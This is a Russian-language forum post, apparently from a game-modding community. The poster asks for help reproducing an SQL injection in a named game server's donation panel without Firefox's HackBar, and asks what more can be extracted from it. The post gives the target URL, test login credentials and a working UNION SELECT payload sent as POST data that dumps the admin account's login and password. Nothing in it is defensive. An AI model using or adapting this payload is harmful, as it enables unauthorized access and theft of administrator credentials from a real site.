Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Помогите с SQL через POST data

-

Вопросы и ответы, обсуждения

- Ваши вопросы по Web-программированию только в данном разделе

Ответ
 
Опции темы
Старый 13.03.2014, 05:30   #1
 Разведчик
Аватар для m4r1n
 
m4r1n скоро будет известенm4r1n скоро будет известенm4r1n скоро будет известенm4r1n скоро будет известенm4r1n скоро будет известен
Регистрация: 13.12.2011
Сообщений: 19
Популярность: 440
Сказал(а) спасибо: 278
Поблагодарили 42 раз(а) в 23 сообщениях
 
По умолчанию Помогите с SQL через POST data

Привет! Нужно воспроизвести старую уязвимость донат панели только не через мазилу с хакбаром , показать другой способ аналогичный этому только в другом браузере,ну или подскажите что еще можно вытащить с этой панели)
Буду очень признателен за помощь!

[Ссылки могут видеть только зарегистрированные пользователи. ] для теста
акк:painel пасс:painel

Опишу баг еще раз т.к. его удалили с форума.(для мазилы через хакбар)
1. Логинимся в донат панель
2. В верхнюю строчку Хакбара вставляем следущее : http://l2kof.net/donate/painel.php?page=comprar_item
3. В Пост Дата вставляем : items[] =99999 union select 1,2,concat_ws(0x3a,login,password),4,5,6,7,0x69746 56D73 from accounts where access_level=1#
4. В столбце Qtd получаем акк и пасс админа
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Пакеты] Чистые elements.data & tasks.data, стабильные, без линка! "Unix Фиксы / Патчи / Программы 31 30.12.2012 15:28
[Помогите!] Post запрос через прокси megbum Вопросы и ответы, обсуждения 2 22.07.2012 22:41
Помогите с post-запросом и его парсингом ! макар11 Вопросы и ответы, обсуждения 2 12.01.2012 13:46
Ищу свежий elements.data, gshop.data и tasks.data torqq Вопросы и ответы, обсуждения 1 16.10.2011 09:47

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 07:29.

Пишите нам: forum@zhyk.ru
Copyright © 2025 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net